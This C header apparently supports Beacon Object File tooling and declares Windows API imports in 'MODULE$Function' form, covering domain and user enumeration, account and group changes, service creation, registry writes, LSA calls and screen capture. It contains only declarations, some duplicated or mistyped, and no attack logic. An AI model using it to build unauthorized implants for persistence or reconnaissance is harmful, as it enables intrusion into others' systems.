WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
WINBASEAPI int __cdecl MSVCRT$_snwprintf(wchar_t * __restrict__ _Dest,size_t _Count,const wchar_t * __restrict__ _Format,...);
WINBASEAPI errno_t __cdecl MSVCRT$wcscpy_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src);
WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
WINBASEAPI size_t __cdecl MSVCRT$wcstombs(char * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _MaxCount);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok(wchar_t * __restrict__ _Str,const wchar_t * __restrict__ _Delim);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok_s(wchar_t *_Str,const wchar_t *_Delim,wchar_t **_Context);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsstr(const wchar_t *_Str,const wchar_t *_SubStr);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source, size_t _Count);
WINBASEAPI wchar_t *__cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source, size_t _Count);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source);
WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1,const wchar_t *_Str2);
WINBASEAPI int __cdecl MSVCRT$_wcsnicmp(const wchar_t *_Str1,const wchar_t *_Str2, size_t _Count);
WINBASEAPI int __cdecl MSVCRT$_strnicmp(const char *_Str1,const char *_Str2, size_t _Count);
WINBASEAPI _CONST_RETURN wchar_t *__cdecl MSVCRT$wcschr(const wchar_t *_Str, wchar_t _Ch);

WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch);
WINBASEAPI unsigned long __cdecl MSVCRT$wcstoul(const wchar_t * __restrict__ _Str,wchar_t ** __restrict__ _EndPtr,int _Radix);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source);
WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *_Str,size_t _MaxCount);
WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char *string1,const char *string2);
WINBASEAPI int __cdecl MSVCRT$strncmp(const char *_Str1,const char *_Str2,size_t _MaxCount);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src);
DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle);
DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle);
DECLSPEC_IMPORT char *__cdecl MSVCRT$strtok(char * __restrict__ _Str,const char * __restrict__ _Delim);
_CRTIMP char *__cdecl MSVCRT$strtok_s(char *_Str,const char *_Delim,char **_Context);
WINBASEAPI unsigned long __cdecl MSVCRT$strtoul(const char * __restrict__ _Str,char ** __restrict__ _EndPtr,int _Radix);
WINBASEAPI size_t __cdecl MSVCRT$strftime(char *_DstBuf,size_t _SizeInBytes,const char *_Format,const struct tm *_Tm);
WINBASEAPI struct tm * __cdecl MSVCRT$gmtime(const time_t *_Time);
WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _Count);
WINBASEAPI void *__cdecl MSVCRT$malloc(size_t size);
WINBASEAPI int __cdecl MSVCRT$sprintf_s(char *buffer, size_t sizeOfBuffer, const char *format, ...);
WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ _Dest,size_t _Count,const char * __restrict__ _Format,...);
WINBASEAPI int __cdecl MSVCRT$sscanf(const char * __restrict__ _Src,const char * __restrict__ _Format,...);
WINBASEAPI int __cdecl MSVCRT$swprintf(wchar_t *__stream, const wchar_t *__format, ...);
WINBASEAPI int __cdecl MSVCRT$swprintf_s(wchar_t *buffer, size_t sizeOfBuffer, const wchar_t *format, ...);
WINBASEAPI int __cdecl MSVCRT$_swprintf(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Format,...);
WINBASEAPI errno_t __cdecl MSVCRT$wcsncpy_s(wchar_t *_Dst, rsize_t _SizeInWords, const wchar_t *_Src, rsize_t _MaxCount);
WINBASEAPI errno_t __cdecl MSVCRT$strcpy_s(char *dest, rsize_t destsz, const char *src);
WINBASEAPI errno_t __cdecl MSVCRT$wcscat_s(wchar_t *dest, size_t destsz, const wchar_t *src);
WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count);
WINBASEAPI int __cdecl MSVCRT$wcsncmp(const wchar_t *_Str1,const wchar_t *_Str2, size_t count);
WINBASEAPI long __cdecl MSVCRT$_wtol(const wchar_t * str);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strncpy(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strrchr(const char *_Str, int _Ch);
WINBASEAPI time_t __cdecl MSVCRT$time(time_t *_Time);
_CRTIMP __time32_t __cdecl MSVCRT$_time32(__time32_t *_Time);
_CRTIMP __time64_t __cdecl MSVCRT$_time64(__time64_t *_Time);
WINBASEAPI int __cdecl MSVCRT$atoi(const char *_Str);
WINBASEAPI char* __cdecl MSVCRT$_itoa(int value, char* str, int base);
WINBASEAPI int __cdecl MSVCRT$_atoi(const char* str);
WINBASEAPI int __cdecl MSVCRT$rand(void);
WINBASEAPI void __cdecl MSVCRT$srand(unsigned int _Seed);
WINBASEAPI unsigned long long __cdecl MSVCRT$_strtoull(const char* strSource, char** endptr, int base);
WINBASEAPI __int64 __cdecl MSVCRT$_strtoi64(const char* strSource, char** endptr, int base);
WINBASEAPI void __cdecl MSVCRT$_cexit();
WINBASEAPI int __cdecl MSVCRT$printf(const char* format, ...);
WINBASEAPI int __cdecl MSVCRT$_dup (int _FileHandle);
WINBASEAPI int __cdecl MSVCRT$_dup2(int _FileHandleSrc, int _FileHandleDst);
WINBASEAPI int __cdecl MSVCRT$_open_osfhandle(intptr_t _OSFileHandle, int _Flags);
WINBASEAPI int __cdecl MSVCRT$_fileno(FILE* _Stream);
WINBASEAPI int __cdecl MSVCRT$setvbuf(FILE* _Stream, char* _Buffer, int _Mode, size_t _Size);
WINBASEAPI int __cdecl MSVCRT$_close(int _FileHandle);
WINBASEAPI int __cdecl MSVCRT$_flushall(void);
WINBASEAPI errno_t __cdecl MSVCRT$freopen_s (FILE** stream, const char* fileName, const char* mode, FILE* oldStream);
WINBASEAPI FILE* __cdecl MSVCRT$__iob_func();
WINBASEAPI int __cdecl MSVCRT$fseek(FILE *stream, long offset, int origin);
WINBASEAPI FILE *__cdecl MSVCRT$fopen(const char *filename, const char *mode);
WINBASEAPI size_t __cdecl MSVCRT$fread(void *buffer, size_t size, size_t count, FILE *stream);
WINBASEAPI int __cdecl MSVCRT$fclose(FILE *stream);
WINBASEAPI int __cdecl MSVCRT$swscanf_s(const wchar_t *buffer, const wchar_t *format, ...);
_CRTIMP uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
_CRTIMP void __cdecl MSVCRT$_endthreadex(unsigned _Retval);

//DNSAPI
DECLSPEC_IMPORT DNS_STATUS WINAPI DNSAPI$DnsQuery_A(PCSTR,WORD,DWORD,PIP4_ARRAY,PDNS_RECORD*,PVOID*);
DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType);

//WSOCK32
DECLSPEC_IMPORT unsigned long __stdcall WSOCK32$inet_addr(const char *cp);

//NETAPI32
WINBASEAPI DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserModalsGet(LPCWSTR servername,DWORD level,LPBYTE *bufptr);
WINBASEAPI DWORD WINAPI NETAPI32$NetServerEnum(LMCSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,DWORD servertype,LMCSTR domain,LPDWORD resume_handle);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetGroups(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetLocalGroups(LPCWSTR servername,LPCWSTR username,DWORD level,DWORD flags,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries);
WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer);
WINBASEAPI DWORD WINAPI NETAPI32$NetGetAnyDCName(LPCWSTR servername,LPCWSTR domainname,LPBYTE *bufptr);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserEnum(LPCWSTR servername,DWORD level,DWORD filter,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle);
WINBASEAPI DWORD WINAPI NETAPI32$NetGroupGetUsers(LPCWSTR servername,LPCWSTR groupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR ResumeHandle);
WINBASEAPI DWORD WINAPI NETAPI32$NetQueryDisplayInformation(LPCWSTR ServerName,DWORD Level,DWORD Index,DWORD EntriesRequested,DWORD PreferredMaximumLength,LPDWORD ReturnedEntryCount,PVOID *SortedBuffer);
WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupEnum(LPCWSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle);
WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupGetMembers(LPCWSTR servername,LPCWSTR localgroupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserSetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE buf,LPDWORD parm_err);
WINBASEAPI DWORD WINAPI NETAPI32$NetShareEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle);
WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer);
WINBASEAPI DWORD WINAPI NETAPI32$NetSessionEnum(LPCWSTR servername, LPCWSTR UncClientName, LPCWSTR username, DWORD level, LPBYTE* bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resumehandle);
WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaUserEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resumehandle);
WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaGetInfo(LMSTR servername,DWORD level,LPBYTE *bufptr);
WINBASEAPI DWORD WINAPI NETAPI32$NetStatisticsGet(LMSTR server,LMSTR service,DWORD level,DWORD options,LPBYTE *bufptr);
WINBASEAPI DWORD WINAPI NETAPI32$NetRemoteTOD(LPCWSTR UncServerName,LPBYTE  *BufferPtr);
WINBASEAPI DWORD WINAPI NETAPI32$DsGetDcNameW(LPCWSTR ComputerName,LPCWSTR DomainName,GUID *DomainGuid,LPCWSTR SiteName,ULONG Flags,PDOMAIN_CONTROLLER_INFOW* DomainControllerInfo);
WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR servername,LPCWSTR groupname,DWORD level,LPBYTE buf,DWORD totalentries);
WINBASEAPI DWORD WINAPI NETAPI32$NetGroupAddUser(LPCWSTR servername,LPCWSTR GroupName,LPCWSTR userName);
WINBASEAPI DWORD WINAPI NETAPI32$NetUserAdd(LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err);

//mpr
WINBASEAPI DWORD WINAPI MPR$WNetOpenEnumW(DWORD dwScope, DWORD dwType, DWORD dwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum);
WINBASEAPI DWORD WINAPI MPR$WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcCount, LPVOID lpBuffer, LPDWORD lpBufferSize);
WINBASEAPI DWORD WINAPI MPR$WNetCloseEnum(HANDLE hEnum);
WINBASEAPI DWORD WINAPI MPR$WNetGetNetworkInformationW(LPCWSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct);
WINBASEAPI DWORD WINAPI MPR$WNetGetConnectionW(LPCWSTR lpLocalName, LPWSTR lpRemoteName, LPDWORD lpnLength);
WINBASEAPI DWORD WINAPI MPR$WNetGetResourceInformationW(LPNETRESOURCEW lpNetResource, LPVOID lpBuffer, LPDWORD lpcbBuffer, LPWSTR *lplpSystem);
WINBASEAPI DWORD WINAPI MPR$WNetGetUserW(LPCWSTR lpName, LPWSTR lpUserName,	LPDWORD lpnLength);
WINBASEAPI DWORD WINAPI MPR$WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD dwFlags);
WINBASEAPI DWORD WINAPI MPR$WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce);

//user32
WINUSERAPI int      WINAPI USER32$EnumDesktopWindows(HDESK hDesktop,WNDENUMPROC lpfn,LPARAM lParam);
WINUSERAPI int      WINAPI USER32$IsWindowVisible (HWND hWnd);
WINUSERAPI int      WINAPI USER32$GetWindowTextA(HWND hWnd,LPSTR lpString,int nMaxCount);
WINUSERAPI int      WINAPI USER32$GetClassNameA(HWND hWnd,LPSTR lpClassName,int nMaxCount);
WINUSERAPI LPWSTR   WINAPI USER32$CharPrevW(LPCWSTR lpszStart,LPCWSTR lpszCurrent);
WINUSERAPI HWND     WINAPI USER32$FindWindowExA (HWND hWndParent, HWND hWndChildAfter, LPCSTR lpszClass, LPCSTR lpszWindow);
WINUSERAPI LRESULT  WINAPI USER32$SendMessageA (HWND hwnd, UINT Msg, WPARAM wParam, LPARAM lParam);
WINUSERAPI int      WINAPI USER32$GetWindowTextA(HWND  hWnd, LPSTR lpString, int nMaxCount);
WINUSERAPI int      WINAPI USER32$GetClassNameA(HWND hWnd, LPTSTR lpClassName, int nMaxCount);
WINUSERAPI BOOL     WINAPI USER32$EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
WINBASEAPI WINBOOL  WINAPI USER32$GetLastInputInfo (PLASTINPUTINFO plii);
WINUSERAPI BOOL     WINAPI USER32$ShowWindow(HWND hWnd, int nCmdShow);
WINUSERAPI int      WINAPI USER32$MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
WINUSERAPI int      WINAPI USER32$wsprintfA(LPSTR unnamedParam1, LPCSTR unnamedParam2, ...);
WINUSERAPI WINBOOL  WINAPI USER32$EnumWindows(WNDENUMPROC lpEnumFunc,LPARAM lParam);
WINUSERAPI HWND     WINAPI USER32$FindWindowA(LPCSTR lpszClass,LPCSTR lpszWindow);
WINUSERAPI HANDLE   WINAPI USER32$GetPropA(HWND hWnd,LPCSTR lpString);
WINUSERAPI LONG     WINAPI USER32$GetWindowLongA(HWND hWnd,int nIndex);
WINUSERAPI LONG_PTR WINAPI USER32$GetWindowLongPtrA(HWND hWnd,int nIndex);
WINUSERAPI DWORD    WINAPI USER32$GetWindowThreadProcessId(HWND hWnd,LPDWORD lpdwProcessId);
WINUSERAPI BOOL     WINAPI USER32$SetPropA(HWND hWnd,LPCSTR lpString,HANDLE hData);
WINUSERAPI LONG     WINAPI USER32$SetWindowLongA(HWND hWnd,int nIndex, LONG dwNewLong);
WINUSERAPI LONG_PTR WINAPI USER32$SetWindowLongPtrA(HWND hWnd,int nIndex, LONG_PTR dwNewLong);
WINUSERAPI LRESULT  WINAPI USER32$SendMessageTimeoutW(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam,UINT fuFlags,UINT uTimeout,PDWORD_PTR lpdwResult);
WINUSERAPI WINBOOL  WINAPI USER32$PostMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam);
WINUSERAPI HDC      WINAPI USER32$GetDC(HWND hWnd);
WINUSERAPI int      WINAPI USER32$ReleaseDC(HWND hWnd, HDC hdc);
WINUSERAPI BOOL     WINAPI USER32$PrintWindow(HWND hwnd, HDC hdcBlt, UINT nFlags);
WINUSERAPI BOOL     WINAPI USER32$SetLayeredWindowAttributes(HWND hWnd, COLORREF crKey, BYTE bAlpha, DWORD dwFlags);
WINUSERAPI BOOL     WINAPI USER32$UpdateWindow(HWND hWnd);
WINUSERAPI BOOL     WINAPI USER32$GetWindowRect(HWND hWnd, LPRECT lpRect);
WINUSERAPI BOOL     WINAPI USER32$GetWindowPlacement(HWND hWnd, WINDOWPLACEMENT* lpwndpl);
WINUSERAPI int      WINAPI USER32$GetSystemMetrics(int nIndex);
WINUSERAPI BOOL     WINAPI USER32$SetWindowPos(HWND hWnd, HWND hWndInsertAfter, int X, int Y, int cx, int cy, UINT uFlags);
WINUSERAPI BOOL     WINAPI USER32$SetProcessDPIAware(void);

//GDI32
DECLSPEC_IMPORT BOOL    WINAPI GDI32$DeleteDC(HDC hdc);
DECLSPEC_IMPORT HDC     WINAPI GDI32$CreateCompatibleDC(HDC hdc);
DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int nWidth, int nHeight);
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ hgdiobj);
DECLSPEC_IMPORT BOOL    WINAPI GDI32$BitBlt(HDC hdcDest, int nXDest, int nYDest, int nWidth, int nHeight, HDC hdcSrc, int nXSrc, int nYSrc, DWORD dwRop);
DECLSPEC_IMPORT BOOL    WINAPI GDI32$DeleteObject(HGDIOBJ hObject);

//OLE32 Stream
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);

//secur32
WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExA (int NameFormat, LPSTR lpNameBuffer, PULONG nSize);
WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExW(int NameFormat, LPWSTR lpNameBuffer, PULONG nSize);
WINBASEAPI BOOLEAN WINAPI SECUR32$GetComputerObjectNameW (int NameFormat, LPWSTR lpNameBuffer, PULONG nSize);
WINBASEAPI NTSTATUS NTAPI SECUR32$LsaGetLogonSessionData(PLUID LogonId,PSECURITY_LOGON_SESSION_DATA *ppLogonSessionData);
WINBASEAPI NTSTATUS NTAPI SECUR32$LsaFreeReturnBuffer (PVOID Buffer);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeCredentialsHandle(CredHandle* phCredential);
WINBASEAPI DWORD WINAPI SECUR32$AcquireCredentialsHandleA(LPSTR pszPrincipal, LPSTR pszPackage, unsigned long fCredentialUse, void* pvLogonId, void* pAuthData, void* pGetKeyFn, void* pvGetKeyArgument, CredHandle* phCredential, TimeStamp* ptsExpiry);
WINBASEAPI DWORD WINAPI SECUR32$InitializeSecurityContextA(CredHandle* phCredential, CtxtHandle* phContext, SEC_CHAR* pszTargetName, unsigned long fContextReq, unsigned long Reserved1, unsigned long TargetDataRep, SecBufferDesc* pInput, unsigned long Reserved2, CtxtHandle* phNewContext, SecBufferDesc* pOutput, unsigned long* pfContextAttr, TimeStamp* ptsExpiry);
WINBASEAPI DWORD WINAPI SECUR32$InitializeSecurityContextW(CredHandle* phCredential, CtxtHandle* phContext, SEC_WCHAR* pszTargetName, unsigned long fContextReq, unsigned long Reserved1, unsigned long TargetDataRep, SecBufferDesc* pInput, unsigned long Reserved2, CtxtHandle* phNewContext, SecBufferDesc* pOutput, unsigned long* pfContextAttr, TimeStamp* ptsExpiry);
WINBASEAPI DWORD WINAPI SECUR32$AcceptSecurityContext(CredHandle* phCredential, CtxtHandle* phContext, SecBufferDesc* pInput, unsigned long fContextReq, unsigned long TargetDataRep, CtxtHandle* phNewContext, SecBufferDesc* pOutput, unsigned long* pfContextAttr, TimeStamp* ptsExpiry);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$DeleteSecurityContext(CtxtHandle* phContext);
WINBASEAPI DWORD WINAPI SECUR32$LsaConnectUntrusted(PHANDLE);
WINBASEAPI NTSTATUS NTAPI SECUR32$LsaDeregisterLogonProcess(HANDLE LsaHandle);
WINBASEAPI DWORD WINAPI SECUR32$LsaLookupAuthenticationPackage(HANDLE, PLSA_STRING, PULONG);
WINBASEAPI DWORD WINAPI SECUR32$LsaCallAuthenticationPackage(HANDLE, ULONG, PVOID, ULONG, PVOID*, PULONG, PNTSTATUS);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$AcquireCredentialsHandleW(LPWSTR, LPWSTR, ULONG, PLUID, PVOID, PVOID, PVOID, PCredHandle, PTimeStamp);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$QueryContextAttributesW(PCtxtHandle, ULONG, PVOID);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$EncryptMessage(PCtxtHandle, ULONG, PSecBufferDesc, ULONG);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$DecryptMessage(PCtxtHandle, PSecBufferDesc, ULONG, PULONG);
WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeContextBuffer(PVOID);

//SHLWAPI
WINBASEAPI LPSTR  WINAPI SHLWAPI$StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch);
WINBASEAPI int    WINAPI SHLWAPI$SHFormatDateTimeA(const FILETIME *pft, DWORD *pdwFlags, LPSTR *pszBuf, UINT cchBuf);
WINBASEAPI LPWSTR WINAPI SHLWAPI$PathCombineW(LPWSTR pszDest, LPCWSTR pszDir, LPCWSTR pszFile);
WINBASEAPI BOOL   WINAPI SHLWAPI$PathFileExistsW(LPCWSTR pszPath);
WINBASEAPI LPSTR  WINAPI SHLWAPI$StrStrA(LPCSTR lpFirst,LPCSTR lpSrch);
WINBASEAPI BOOL   WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);

//advapi32
WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID Sid,LPSTR *StringSid);
WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(LPCWSTR StringSecurityDescriptor,DWORD StringSDRevision,PSECURITY_DESCRIPTOR *SecurityDescriptor,PULONG SecurityDescriptorSize);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidA (LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeNameA (LPCSTR lpSystemName, PLUID lpLuid, LPSTR lpName, LPDWORD cchName);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeDisplayNameA (LPCSTR lpSystemName, LPCSTR lpName, LPSTR lpDisplayName, LPDWORD cchDisplayName, LPDWORD lpLanguageId);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess);
WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService,LPSERVICE_STATUS lpServiceStatus);
WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGA lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject);
WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExA(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCSTR pszGroupName);
WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService,SC_STATUS_TYPE InfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPVOID lpInfo);
WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword);
WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService);
WINADVAPI LONG    WINAPI ADVAPI32$RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult);
WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExW(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCWSTR pszGroupName);
WINADVAPI LONG    WINAPI ADVAPI32$RegCreateKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult);
WINADVAPI LONG    WINAPI ADVAPI32$RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,CONST BYTE *lpData,DWORD cbData);
WINADVAPI LONG    WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult);
WINADVAPI LONG    WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR lpMachineName,HKEY hKey,PHKEY phkResult);
WINADVAPI LONG    WINAPI ADVAPI32$RegCloseKey(HKEY hKey);
WINADVAPI LONG    WINAPI ADVAPI32$RegOpenKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult);
WINADVAPI LONG    WINAPI ADVAPI32$RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition);
WINADVAPI LONG    WINAPI ADVAPI32$RegDeleteKeyExA(HKEY hKey,LPCSTR lpSubKey,REGSAM samDesired,DWORD Reserved);
WINADVAPI LONG    WINAPI ADVAPI32$RegDeleteKeyValueA(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName);
WINADVAPI LONG    WINAPI ADVAPI32$RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData);
